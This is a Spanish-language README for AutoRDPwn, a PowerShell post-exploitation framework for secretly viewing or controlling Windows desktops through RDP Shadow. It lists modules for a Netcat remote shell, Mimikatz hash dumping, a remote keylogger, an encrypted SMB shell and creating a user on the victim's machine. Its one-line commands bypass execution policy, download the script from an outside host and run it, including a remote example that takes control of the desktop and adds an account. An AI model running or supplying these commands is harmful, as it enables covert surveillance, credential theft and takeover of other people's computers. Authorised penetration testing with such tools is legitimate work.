AutoRDPwn es un marco post-explotación creado en Powershell, diseñado principalmente para automatizar el ataque Shadow (Shadow Attack) a los ordenadores con Microsoft Windows. Esta vulnerabilidad (listada como una característica por Microsoft) permite a un atacante remoto ver el escritorio de su víctima sin su consentimiento, e incluso controlarlo a petición, usando herramientas nativas del propio sistema operativo.
Gracias a los módulos adicionales, es posible obtener un shell remoto a través de Netcat, descargar hashes del sistema con Mimikatz, cargar un keylogger remoto y mucho más. Todo esto, a través de un menú completamente intuitivo en siete idiomas diferentes.
Además, es posible utilizarlo en una shell inversa a través de una serie de parámetros que se describen en la sección de uso.
Requisitos
Powershell 4.0 o superior
Cambios
• Muchos errores corregidos
• Mejoras estéticas y tiempos de espera mejorados
• Conexión de Proxy-Aware a través de la configuración del sistema
• Ahora es posible utilizar la herramienta offline descargando el archivo .zip
• Detección automática del idioma pulsando la tecla Enter
• Invoke-DCOM ha sido reemplazado por SharpRDP
• PowerUp ha sido reemplazado por Invoke-PrivescCheck
• Creación de subrutinas de limpieza automática en la víctima
• Nuevo módulo disponible: SMB Shell cifrado con AES
• Nuevo módulo disponible: Cambiar de usuario con RunAs
*El resto de los cambios pueden ser consultados en el archivo CHANGELOG
Uso
Esta aplicación puede utilizarse localmente, a distancia o para pivotar entre equipos.
Cuando se utiliza a distancia en shell inversa, es necesario utilizar los siguientes parámetros:
Parámetro | Descripción |
---|---|
-admin / -noadmin | Dependiendo de los permisos que tengamos, usaremos uno u otro |
-nogui | Esto evitará cargar el menú y algunos colores, garantizando su funcionalidad |
-lang | Escogeremos nuestro idioma (inglés, español, francés, alemán, italiano, ruso o portugués) |
-option | Al igual que con el menú, podemos elegir cómo lanzar el ataque |
-shadow | Decidiremos si queremos ver o controlar el dispositivo remoto |
-createuser | Este parámetro es opcional, el usuario AutoRDPwn:AutoRDPwn se creará en la máquina de la víctima |
-noclean | Desactiva el proceso de deshacer todos los cambios en la computadora de la víctima |
Ejecución local en una línea:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Ejemplo de ejecución remota en una línea:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
La guía detallada de uso se encuentra en el siguiente enlace: aquí (y en español)
Capturas de Pantalla


Licencia
Este proyecto está licenciado bajo la licencia GNU 3.0 – ver el archivo LICENSE para más detalles.
Para más información, puede contactar a través de info@darkbyte.net